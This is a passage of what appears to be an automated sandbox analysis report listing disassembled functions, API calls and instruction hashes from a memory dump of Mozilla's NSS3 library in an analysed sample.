                                                                                                                                                                                                                              • Part of subcall function 6CBBFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CBB8D2D,?,00000000,?), ref: 6CBBFB85
                                                                                                                                                                                                                              • Part of subcall function 6CBBFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CBBFBB1
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CC894B0,?,?,?,?,?,?,?,?,6CB63FFF,00000000,?), ref: 6CB6ADEC
                                                                                                                                                                                                                              • Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CB63FFF), ref: 6CB6AE3C
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2372449006-0
                                                                                                                                                                                                                            • Opcode ID: 3e97dba117db11fbb8ab0a1095c10bad0e7c4daf9e6047c64a035eb7c6fa3915
                                                                                                                                                                                                                            • Instruction ID: 7a3326b48a1450cd85a5b173f2008fabc07c7ac5203c48735ca46f7818a823e0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e97dba117db11fbb8ab0a1095c10bad0e7c4daf9e6047c64a035eb7c6fa3915
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B113B71F002546BEB109B66DC41BBF73B8DF9514DF044129EC59A6B41FB20E95886E3
                                                                                                                                                                                                                            Function 6CB8CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBA1E10: TlsGetValue.KERNEL32 ref: 6CBA1E36
                                                                                                                                                                                                                              • Part of subcall function 6CBA1E10: EnterCriticalSection.KERNEL32(?,?,?,6CB7B1EE,2404110F,?,?), ref: 6CBA1E4B
                                                                                                                                                                                                                              • Part of subcall function 6CBA1E10: PR_Unlock.NSS3 ref: 6CBA1E76
                                                                                                                                                                                                                            • free.MOZGLUE(?,6CB8D079,00000000,00000001), ref: 6CB8CDA5
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(?,6CB8D079,00000000,00000001), ref: 6CB8CDB6
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CB8D079,00000000,00000001), ref: 6CB8CDCF
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,6CB8D079,00000000,00000001), ref: 6CB8CDE2
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CB8CDE9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1720798025-0
                                                                                                                                                                                                                            • Opcode ID: cfc380ddb49ce438a0678896b39d6d892c2d0c95c4539bf0e18c6dd219400c25
                                                                                                                                                                                                                            • Instruction ID: 14dd8519718c71f376f5b8487e6e1f101cf2a8815fd6ae41da8cba5e01d60a7a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfc380ddb49ce438a0678896b39d6d892c2d0c95c4539bf0e18c6dd219400c25
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F911C2F6B02161ABDB00AFA5EC8499AB73CFF042597140221E90997E01E732F474C7E2
                                                                                                                                                                                                                            Function 6CBF2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBF5B56
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBF2CEC
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF2D02
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF2D1F
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF2D42
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF2D5B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1593528140-0
                                                                                                                                                                                                                            • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                            • Instruction ID: 215a2b6731b273b6720477662404a65502753934802b507a30744073a6c62afb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D101DBB5A002845BE7309F25FC40BC7B7A5EF45318F004525E86D86B10E636F41EC7A3
                                                                                                                                                                                                                            Function 6CBF2D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CBF5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CBF5B56
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBF2D9C
                                                                                                                                                                                                                              • Part of subcall function 6CC0C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC0C2BF
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF2DB2
                                                                                                                                                                                                                            • PR_EnterMonitor.NSS3(?), ref: 6CBF2DCF
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF2DF2
                                                                                                                                                                                                                            • PR_ExitMonitor.NSS3(?), ref: 6CBF2E0B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1593528140-0
                                                                                                                                                                                                                            • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                            • Instruction ID: fc291948f8f2db21fde22ffd71b02fde37804260090d254b5056d55d412d8db7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD01C4B5A002845BEB309F25FC01FC7B7A1EF45318F004435E86986B11E636F82E86A3
                                                                                                                                                                                                                            Function 6CC7BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6CC77AFE,?,?,?,?,?,?,?,?,6CC7798A), ref: 6CC7BDC3
                                                                                                                                                                                                                            • free.MOZGLUE(?,?,6CC77AFE,?,?,?,?,?,?,?,?,6CC7798A), ref: 6CC7BDCA
                                                                                                                                                                                                                            • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6CC77AFE,?,?,?,?,?,?,?,?,6CC7798A), ref: 6CC7BDE9
                                                                                                                                                                                                                            • free.MOZGLUE(?,00000000,00000000,?,6CC77AFE,?,?,?,?,?,?,?,?,6CC7798A), ref: 6CC7BE21
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,00000000,?,6CC77AFE,?,?,?,?,?,?,?,?,6CC7798A), ref: 6CC7BE32
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3662805584-0
                                                                                                                                                                                                                            • Opcode ID: 73687568eca1dd583cae471435284917e147f8553b9acc64a3327626794dd68f
                                                                                                                                                                                                                            • Instruction ID: a8ffaec84688736c6b8174560570752ce3e3f7bc958646d1b70ae91884ccda83
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73687568eca1dd583cae471435284917e147f8553b9acc64a3327626794dd68f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B01145B1B01200CFDF10EF69C82DB063BB8FB0A344B04106BE50AD7300E771A696CBA1
                                                                                                                                                                                                                            Function 6CC77C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_Free.NSS3(?), ref: 6CC77C73
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC77C83
                                                                                                                                                                                                                            • malloc.MOZGLUE(00000001), ref: 6CC77C8D
                                                                                                                                                                                                                            • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CC77C9F
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CC77CAD
                                                                                                                                                                                                                              • Part of subcall function 6CC29BF0: TlsGetValue.KERNEL32(?,?,?,6CC70A75), ref: 6CC29C07
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 105370314-0
                                                                                                                                                                                                                            • Opcode ID: 576bf63b6a9bdb0fb7310525bb8d0038d30f29fc7d7c92f012ec3152287507f1
                                                                                                                                                                                                                            • Instruction ID: 739defb646cd45b4f62a5475fa805c056f3ccfa1d49afb0bbcc8b149d2a0db67
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 576bf63b6a9bdb0fb7310525bb8d0038d30f29fc7d7c92f012ec3152287507f1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDF0C2B1D102066FEB109F7A9C09997776CEF04265B018439E809C3B00FB34E114CBE5
                                                                                                                                                                                                                            Function 6CC7ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(6CC7A6D8), ref: 6CC7AE0D
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CC7AE14
                                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(6CC7A6D8), ref: 6CC7AE36
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CC7AE3D
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,00000000,?,?,6CC7A6D8), ref: 6CC7AE47
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: free$CriticalDeleteSection
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 682657753-0
                                                                                                                                                                                                                            • Opcode ID: b9a55ec881221efc5a53797ea3a34ea251873d528d1e9f2fd6ed989541175760
                                                                                                                                                                                                                            • Instruction ID: 8ad185585eb6244f09f9b76ea2467402f594c7c7e11f433a85a889adbf25cf2c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9a55ec881221efc5a53797ea3a34ea251873d528d1e9f2fd6ed989541175760
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FFF096B5201A01ABCB109FA8D8489577778FF867757144328F53A93940E731E165C7E9
                                                                                                                                                                                                                            Function 6CB07C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB07D35
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 632333372-598938438
                                                                                                                                                                                                                            • Opcode ID: b166095f23ae7c04cacbf898c01f195ad463da5b44474b2b2b9f740a358d0132
                                                                                                                                                                                                                            • Instruction ID: 4b9f18f7b43914325a4055caf64a513e132ec4c2ad7dbe5e29fad39ce4f4ec60
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b166095f23ae7c04cacbf898c01f195ad463da5b44474b2b2b9f740a358d0132
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5931F471F042799BC710CF9DC8809BEFBE1EF44305B590296E444B7B85E6B1E852C7A1
                                                                                                                                                                                                                            Function 6CAF6C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CAF6D36
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • database corruption, xrefs: 6CAF6D2A
                                                                                                                                                                                                                            • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CAF6D20
                                                                                                                                                                                                                            • %s at line %d of [%.10s], xrefs: 6CAF6D2F
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: sqlite3_log
                                                                                                                                                                                                                            • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                            • API String ID: 632333372-598938438
                                                                                                                                                                                                                            • Opcode ID: c1b5f7845376025636f6b7b53e50eee035ca5526f13009c798c380cad4b94162
                                                                                                                                                                                                                            • Instruction ID: 8cfa28b0635e53a8d76eec3758193c1ce5edd26c34faedcb744c22cee3cb53ed
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1b5f7845376025636f6b7b53e50eee035ca5526f13009c798c380cad4b94162
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B210631604B059BC720CE19D941B5AB7F2AF84308F14852CE8699BF51E371F98AC7A1
                                                                                                                                                                                                                            Function 6CC2CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 6CC2CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CC2CC7B), ref: 6CC2CD7A
                                                                                                                                                                                                                              • Part of subcall function 6CC2CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC2CD8E
                                                                                                                                                                                                                              • Part of subcall function 6CC2CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC2CDA5
                                                                                                                                                                                                                              • Part of subcall function 6CC2CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC2CDB8
                                                                                                                                                                                                                            • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6CC2CCB5
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(6CCC14F4,6CCC02AC,00000090), ref: 6CC2CCD3
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(6CCC1588,6CCC02AC,00000090), ref: 6CC2CD2B
                                                                                                                                                                                                                              • Part of subcall function 6CB49AC0: socket.WSOCK32(?,00000017,6CB499BE), ref: 6CB49AE6
                                                                                                                                                                                                                              • Part of subcall function 6CB49AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CB499BE), ref: 6CB49AFC
                                                                                                                                                                                                                              • Part of subcall function 6CB50590: closesocket.WSOCK32(6CB49A8F,?,?,6CB49A8F,00000000), ref: 6CB50597
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                                                                                                                                                            • String ID: Ipv6_to_Ipv4 layer
                                                                                                                                                                                                                            • API String ID: 1231378898-412307543
                                                                                                                                                                                                                            • Opcode ID: 6f91631eb574857ebfa7b1f618895800c34c627d6a41072689c5cf698eb42807
                                                                                                                                                                                                                            • Instruction ID: 332e1463d55707daec888456f7b7bf34926fe3f61b0d5dfa000f22aa66d3e499
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f91631eb574857ebfa7b1f618895800c34c627d6a41072689c5cf698eb42807
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE115BF2B002409EEB209F6FDC56B863BB8E746298F141029E506CBB41F775C6148BE6
                                                                                                                                                                                                                            Function 6CB91CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_Initialize), ref: 6CB91CD8
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pInitArgs = 0x%p,?), ref: 6CB91CF1
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_Now.NSS3 ref: 6CC70A22
